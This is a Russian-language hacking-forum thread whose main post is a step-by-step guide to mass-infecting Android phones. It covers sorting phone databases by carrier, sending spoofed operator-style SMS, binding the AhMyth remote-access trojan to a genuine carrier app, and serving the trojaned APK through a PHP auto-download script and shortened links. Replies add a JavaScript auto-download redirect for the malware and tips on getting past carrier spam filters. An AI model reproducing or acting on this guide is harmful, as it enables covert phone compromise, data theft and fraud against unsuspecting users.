FAQ Массовые рассылки под Android (подмена + фейк)

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
ГЛАВНЫЙ АДМИН
Админ

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
ГЛАВНЫЙ АДМИН
Админ

Массовые рассылки под Android (подмена + фейк)

План работы и схема

И так, давайте рассмотрим наш план действий:

Представим такую ситуацию. Каждый из нас знает, что операторы связи (Билайн, Теле2, МТС и др) рассылают своим пользователям частенько обычные сообщения. Это может быть реклама или сообщения о том, что закончился тот же мобильный интернет. Было? Вот в один из таких случаев жертве приходит сообщение. В нем указано, что-то связанное с новым приложением или программой от разработчиков. Как это все делать на примере я покажу ниже. Он как неопытный пользователь решает его скачать. Вот тут то и запахло жареным. Нет, он не обнаружит вшитый вирус. Просто его данные уже будут не его. Теперь рассмотрим туже ситуацию только со стороны хакера. Это будет в разделе практики.

Практика

Вот здесь давайте рассмотрим подробности нашей работы. Для начало берем базу телефонов. Я дам вам две базы, а дальше фильтруйте сами, я только покажу как.

Берем все базы здесь:
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!

Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!

Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!


Чтобы определить нужного вам оператора связи берем начало номера телефона. Допустим +79602345678. После семерки идет наш оператор. Все они приведены ниже:

Билайн: диапазон от 903 до 909 (старый), от 960 до 976 (новый).
МТС: диапазон от 910 до 919 (старый), от 980 до 989 (новый).
Теле2: отдельные номера 900, 901, 902, 908, 953, 958, 904, 950, 951, 952, 991, 992, 993-999.
Мегафон: диапазон от 920 до 928 (старый), от 929 до 937 (новый).

И так. Для тех кто не понял. Берете базу выше. И ищите нужного вам оператора по диапазонам. То есть если к примеру после+7 идет 902 то у данного номера оператор связи Теле2. Надеюсь я объяснил доходчиво. Идем дальше.

Теперь нам нужно как-то разослать сообщение примерно такого типа:

1567856712752.png

Я объясняю на примере Билайн. Дальше уже подбирайте сами. Просто меняйте название Beeline на нужное вам и все. Теперь переходим
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!
.

На sip-system.com у нас услуга подмены номера. Но нам нужна именно рассылка сообщений. Думаю как действовать разберетесь. Для начало переходите в регистрацию и выбираете Аккаунт дляфлуда (здесь придется заплатить). После скачиваете софт. Но для получения пароля от архива придется потрудиться. Думаю вы разберетесь. Двигаем к созданию нашего вируса. Я работал на Windows, поэтому использовал программу с названиемAhMyth RAT. Думаю вы о ней знаете. Идем
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!
и скачиваем нашу заветную программу. Потом запускаем. И в открывшейся вкладки видим это:

687474703a2f2f692e696d6775722e636f6d2f6e4854474748692e706e67.png

И так. Вводим порт 42474 (можно и без этого конечно) и кликаем Listen. Теперь переходим во 2 вкладку. Там мы в Source IP вводим наш IP адрес. Да, здесь уже показывали подробную инструкцию по эксплуатации данного софта, но все же я повторюсь. IP нам потребуется внешний. Не локальный. Узнать его можно
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!
. Данный сайт успешно себя зарекомендовал, поэтому советую использовать именно его. Теперь после этой всей мути нам нужно склеить наш маленький вирус с программой. Нужно официальное приложения. К примеру тот же My Beeline. Надеюсь вы поняли, что искать. После загружаем программу себе на комп, а именно apk'а файл и кликаемBind With Another Apk. Там ищете свою программу и склеиваете с вирусом . Так, объясняю сразу. Могут возникнуть проблемы с софтом. Если у вас не работает AhMyth Rat, то в большинстве случаев это происходит из-за необновленной версии Java или вообще ее отсутствие. Чтобы это решить идете на
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!
. И скачиваете. После переустанавливаете прогу и все по новой. Как наш файл приготовится нужно обзавестись хостингом. Кто не хочет платить идете
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!
и используете временную бесплатную версию от RegRu. Создаете автоматическую загрузку файла на устройство жертвы. Как? Все делаете легко и просто.

Создаем PHP файл. Открываем его через блокнот и пишем это:

PHP:
<?php
header("Content-disposition: attachment; filename=названия файла.apk");
header("Content-type: application/octet-stream");
header("Content-Description: File Transfer");
readfile("путь к файлу");
?>
Заливаете на сайт и все. Если не получилось попробуйте залить наш вирус на сайт и указать в readifile ссылку как путь к файлу расположенный на нашем сайте (https://путь к файлу/). Теперь дело за малым. А именно распространения. Перед этим мы берем нашу готовую ссылку на сайт с автозагрузкой и сокращаем ее. Вот вам три сайта для этого дела:

1.
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!

2.
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!

3.
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!


Использовать можете какой угодно. После просто вводите эту ссылку в сообщения для флуда. Его я оставил выше. Надеюсь объяснил понятно и просто.

Вывод

Вот таким не хилым способом можно провести массовый взлом телефонов. Сказать, что очень сложно нельзя, но все же легким это тоже не назовешь. Здесь все зависит от жертвы. Насколько она умна, чтобы ввестись на такое. Да, все сайты представленные мною не являются рекламой. Я использую их сам. Ну а на этом у меня все. Удачи ;)

взял с codeby
 

and999

Пользователь
Пользователь

and999

Пользователь
Пользователь

Приветствую а скажи пожалуйста какие сейчас актуальные сайты где можно сделать подмену смс?
 

Bloody Typhoon

Пользователь
Пользователь

Bloody Typhoon

Пользователь
Пользователь

Автоскачку малвари можно еще c помощью JS сделать:

<script type="text/javascript">setTimeout('document.location.href="URL";', 1000);</script>

URL - Путь до вашего файла.
1000 - Задержка в 1 секунду, перед срабатыванием скрипта.
 

ubuntolog

Пользователь
Пользователь

ubuntolog

Пользователь
Пользователь

С подменой номера сейчас сложно на сип рассылку делать, точнее сделать то ее можно, а вот опсосы давно внедрили антиспам, и при заказе рассылки к примеру на базу 5к номеров, не факт что и четверть дойдет до абона, доставка будет показана, а вот сообщения не приходят) Давно пропалена тема, в 12-15 годах я рассылал по 10к базы, вот тогда инсталы как бешенные шли, да и юзверь не пуганый был, хотя пользовался таким смешным банк ботом, со смешным функционалом) Сейчас более менее только на МТС рассылать и ТЕле2, еще так себе норм проходят. А мега, Билайн там жесть антиспам
 
Сверху Снизу